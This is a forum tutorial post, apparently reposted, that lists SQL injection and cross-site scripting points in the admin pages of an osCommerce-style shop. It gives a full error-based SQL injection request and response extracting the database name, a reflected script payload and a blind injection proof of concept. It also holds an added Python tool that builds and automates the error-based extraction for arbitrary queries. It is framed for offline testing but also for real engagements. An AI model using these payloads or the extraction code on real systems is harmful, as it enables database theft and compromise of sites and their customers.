[Tutorial] Multiplas XSS/SQLi
Look, first of all I want to make it clear that I got this tutorial from the deep web, so it is not mine!
Second, it was tested on Windows XP using XAMPP!
This is used a lot for little games u.u
Well, there it is, read it (yes, it's in English). I managed to do it, read it and everything, so figure it out hehe
SQL Injection
######################
SQL Injection 1
/catalog/admin/index.php
SQL Injection 2
/catalog/admin/newsletters.php
SQL Injection 3
/catalog/admin/orders.php
SQL Injection 4
/catalog/admin/xsell.php
SQL Injection 5
/catalog/admin/create_account_process.php - Create Account (country, zone_id parameters)
Additional
/catalog/admin/categories.php
/catalog/admin/articles.php
/catalog/admin/create_account.php
XSS
#######################
Persistent
/catalog/admin/newsletters.php - Create newsletter (module parameter)
/catalog/admin/categories.php - Create category (multiple parameters)
/catalog/admin/xsell.php - Create cross sell (products_model parameter)
<snip>
Reflective
/catalog/admin/xsell.php?add_related_product_ID=1&action=update_cross&x=24&y=10&product[]=1&cross[]=1&product[]=1&reciprocal_link_cross[]=1
/catalog/admin/xsell.php?add_related_product_ID=><script>alert(1) </script>
/catalog/admin/create_account_process.php - Create account (firstname, lastname, postcode, street_address, city parameters)
/catalog/admin/articles.php - Create articles - (all parameters)
<snip>
Code Examples:
#######################
SQL Injection Example 1 - Error Based
Request - extracting DATABASE() (the current database name) through the country parameter
action=process&firstname=cust&lastname=cust&email_address=cust@cust.com&street_address=cust&postcode=cust&city=cust&zone_id=&country=1' AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,113,58),(MID((IFNULL(CAST(DATABASE() AS CHAR),CHAR(32))),1,50)),CHAR(58,102,109,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'eVyL'='eVyL&telephone=12345678&fax=&newsletter=1&customers_group_id=0&x=19&y=5
Response - Current DB = sectestosc (the value sits between the :srq: and :fmf: markers in the 1062 duplicate-entry error, which also echoes the whole query)
<font color="#000000"><b>1062 - Duplicate entry ':srq:sectestosc:fmf:1' for key 'group_key'<br><br>select zone_name from zones where zone_country_id = '1' AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,113,58),(MID((IFNULL(CAST(DATABASE() AS CHAR),CHAR(32))),1,50)),CHAR(58,102,109,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'eVyL'='eVyL' and zone_id = ''<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>
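The error-based request above works because FLOOR(RAND(0)*2) yields a fixed sequence (0, 1, 1, 0, 1, 1, ...), so grouping information_schema.tables rows by the CONCAT() key collides and MySQL reports the colliding key, with the value wrapped between the CHAR() markers, in its 1062 message. The example below is added here and is not part of the original post or of the advisory it reproduces: it builds that payload for an arbitrary expression, parses the value back out of the error text, and goes one step beyond the page by walking the MID() offset so values longer than one 50-character window can be read. The fake_server function, the FAKE_DB contents and the helper names are constructed for offline use; only the payload structure, the markers and the 1062 error text come from the page.

```python
import re
from urllib.parse import urlencode, parse_qs

# The page's payload wraps the extracted value in two markers so it can be
# picked out of the MySQL 1062 error text unambiguously:
#   CHAR(58,115,114,113,58) = ':srq:'    CHAR(58,102,109,102,58) = ':fmf:'
LEFT_MARKER = ":srq:"
RIGHT_MARKER = ":fmf:"
CHUNK = 50  # MID(...,offset,50): keeps the group key short enough for the index


def mysql_char(s):
    """Encode a string as MySQL CHAR(...) so the payload needs no quote characters."""
    return "CHAR(" + ",".join(str(ord(c)) for c in s) + ")"


def build_error_payload(expression, offset=1, length=CHUNK):
    """Return the RAND(0)/GROUP BY subquery from the page for an arbitrary expression.

    FLOOR(RAND(0)*2) is a fixed sequence (0,1,1,0,1,1,...), so grouping on the
    CONCAT() value collides on the third row of information_schema.tables and
    MySQL raises 1062 'Duplicate entry' with the group key, i.e. the value, in it.
    """
    value = f"MID((IFNULL(CAST(({expression}) AS CHAR),CHAR(32))),{offset},{length})"
    key = (f"CONCAT({mysql_char(LEFT_MARKER)},({value}),"
           f"{mysql_char(RIGHT_MARKER)},FLOOR(RAND(0)*2))")
    return f"(SELECT 5273 FROM(SELECT COUNT(*),{key}x FROM information_schema.tables GROUP BY x)a)"


def build_request_body(subquery):
    """Put the subquery in the 'country' field of the create-account POST body as the
    page does: close the quoted string, AND in the subquery, reopen a true string."""
    fields = {
        "action": "process", "firstname": "cust", "lastname": "cust",
        "email_address": "cust@cust.com", "street_address": "cust", "postcode": "cust",
        "city": "cust", "zone_id": "",
        "country": f"1' AND {subquery} AND 'eVyL'='eVyL",
        "telephone": "12345678", "fax": "", "newsletter": "1",
        "customers_group_id": "0", "x": "19", "y": "5",
    }
    return urlencode(fields)  # percent-encoded, which is what actually goes on the wire


def injected_country(body):
    """Decode the country field back out of a request body (for inspection)."""
    return parse_qs(body)["country"][0]


def extract_from_error(body):
    """Pull the value between the markers out of a 1062 error page; None if absent."""
    m = re.search(re.escape(LEFT_MARKER) + "(.*?)" + re.escape(RIGHT_MARKER), body)
    return m.group(1) if m else None


def extract_value(send, expression, length=CHUNK):
    """Read a value longer than one MID() window by advancing the offset.
    `send(subquery) -> response body` is whatever transport is in use."""
    out, offset = "", 1
    while True:
        chunk = extract_from_error(send(build_error_payload(expression, offset, length)))
        if chunk is None:
            return None  # no error page: injection did not fire (fixed, filtered, not MySQL)
        out += chunk
        if len(chunk) < length:  # a short (or empty) window means the end of the value
            return out
        offset += length


# --- constructed stand-in for the vulnerable host, so this runs offline ----------
# The error text mirrors the response shown on the page; the database name and
# the user() value are made up for the simulation.
FAKE_DB = {"DATABASE()": "sectestosc", "select user()": "root@localhost"}
_MID = re.compile(r"CAST\(\((.+?)\) AS CHAR\),CHAR\(32\)\)\),(\d+),(\d+)\)")


def fake_server(subquery):
    m = _MID.search(subquery)
    if not m or m.group(1) not in FAKE_DB:
        return "<html>Account created</html>"  # normal page, nothing to harvest
    expr, offset, length = m.group(1), int(m.group(2)), int(m.group(3))
    piece = FAKE_DB[expr][offset - 1: offset - 1 + length]  # MID() is 1-based
    return (f"<b>1062 - Duplicate entry '{LEFT_MARKER}{piece}{RIGHT_MARKER}1' for key "
            f"'group_key'<br>select zone_name from zones where zone_country_id = '1' AND "
            f"{subquery} AND 'eVyL'='eVyL' and zone_id = ''</b>")


if __name__ == "__main__":
    print(injected_country(build_request_body(build_error_payload("DATABASE()"))))
    print("database:", extract_value(fake_server, "DATABASE()"))
    print("user    :", extract_value(fake_server, "select user()", length=5))
```

Two things to check before relying on the error text in a real engagement: the technique needs a table with at least three rows for the GROUP BY collision, which information_schema.tables guarantees, and it needs the application to echo the database error to the client, which is what the [TEP STOP] page does here. If errors are suppressed, the same query structure gives nothing and the blind approach in the next example is what remains.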
SQL Injection Example 2 - Blind
POC 1
(TRUE):
GET /catalog/admin/newsletters.php/1' OR substr((select user()),1,4)='root HTTP/1.1
Valid Newsletter Page - 200
(FALSE):
GET /catalog/admin/newsletters.php/1' OR substr((select user()),1,4)='test
Invalid Redirect Page - 302